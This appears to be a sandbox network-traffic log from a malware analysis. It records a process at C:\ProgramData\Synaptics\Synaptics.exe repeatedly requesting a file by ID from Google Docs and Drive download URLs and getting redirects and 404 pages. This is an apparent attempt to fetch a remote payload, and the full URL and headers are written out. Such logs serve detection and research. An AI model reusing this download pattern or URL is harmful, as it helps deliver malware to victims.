                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                2024-12-30 09:58:27 UTC  1390  IN
                                                                                                                Data Ascii: t Found)!!1</title><style nonce="vQVqo8hTPFjJCmximoM_fQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                2024-12-30 09:58:27 UTC  115  IN
                                                                                                                Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                                61  192.168.2.7  59878  216.58.206.46  443  7412  C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                                                2024-12-30 09:58:27 UTC  345  OUT  GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
2024-12-30 09:58:27 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:27 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-ddWK2_fVp6It8RhQxMPV6g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
62 | 192.168.2.7 | 59879 | 216.58.206.46 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 09:58:27 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
2024-12-30 09:58:27 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:27 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-ulmZLAyUQST1f5-DkkVbpw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
63 | 192.168.2.7 | 59880 | 142.250.181.225 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 09:58:27 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
2024-12-30 09:58:27 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC7SUMq9-O_oN1hcpt_-O17tpLTFeK0b2GEzEpVwaJDJ079IQbnN1qXOf5G7LRMNS0iBjiaP_yM
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:27 GMT
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-rjUY-6Z4irFyqqbnBj_uhA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
2024-12-30 09:58:27 UTC | 140 | IN
                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 09:58:27 UTC | 1390 | IN
                                                                                                                Data Ascii: 404 (Not Found)!!1</title><style nonce="2Ok6btycaAHmncoF3jlmjA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 09:58:27 UTC | 122 | IN
                                                                                                                Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
64 | 192.168.2.7 | 59884 | 142.250.181.225 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 09:58:28 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
2024-12-30 09:58:28 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC6OAnisgPUgwtHfGedXVtwueot4s7kDeXM2iAh4_zEdsKbtD2mdb-Zn0gmCrupcNerzpDvft08
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:28 GMT
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-TKg9UAIDFxI15YZ_8Uh6Dw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
2024-12-30 09:58:28 UTC | 140 | IN
                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 09:58:28 UTC | 1390 | IN
                                                                                                                Data Ascii: 404 (Not Found)!!1</title><style nonce="w95uaxYvaZnTqbLbjbDr2w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 09:58:28 UTC | 122 | IN
                                                                                                                Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
65 | 192.168.2.7 | 59889 | 216.58.206.46 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 09:58:28 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
2024-12-30 09:58:28 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:28 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-FvQv0O4xlOEaInnB_B5sfw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
66 | 192.168.2.7 | 59895 | 142.250.181.225 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 09:58:28 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
67 | 192.168.2.7 | 59892 | 216.58.206.46 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 09:58:28 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
68 | 192.168.2.7 | 59902 | 216.58.206.46 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 09:58:29 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
2024-12-30 09:58:29 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:29 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-xNicjmrTady4uHQqCiT4Kw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
69 | 192.168.2.7 | 59903 | 142.250.181.225 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 09:58:29 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
2024-12-30 09:58:29 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC5cBSJBlGNe2M338oyPRFCN61tusA-lRGTKtbbw9e1kjagFEnbLIwBdntMbz5RHFpitDB4vOqM
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:29 GMT
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-mxXBqobfgtbZ-Iz5KCR5dA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
2024-12-30 09:58:29 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 09:58:29 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="txp-B56HmbBOvlGtuqCOfw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 09:58:29 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
70 | 192.168.2.7 | 59904 | 216.58.206.46 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 09:58:29 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
2024-12-30 09:58:29 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:29 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-t1_n4T49q4FRF_5DpGiazA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
71 | 192.168.2.7 | 59913 | 216.58.206.46 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 09:58:30 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
2024-12-30 09:58:30 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:30 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-5bgS8gZohxK8DSKGuVkkVA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
72 | 192.168.2.7 | 59914 | 216.58.206.46 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 09:58:30 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
2024-12-30 09:58:30 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
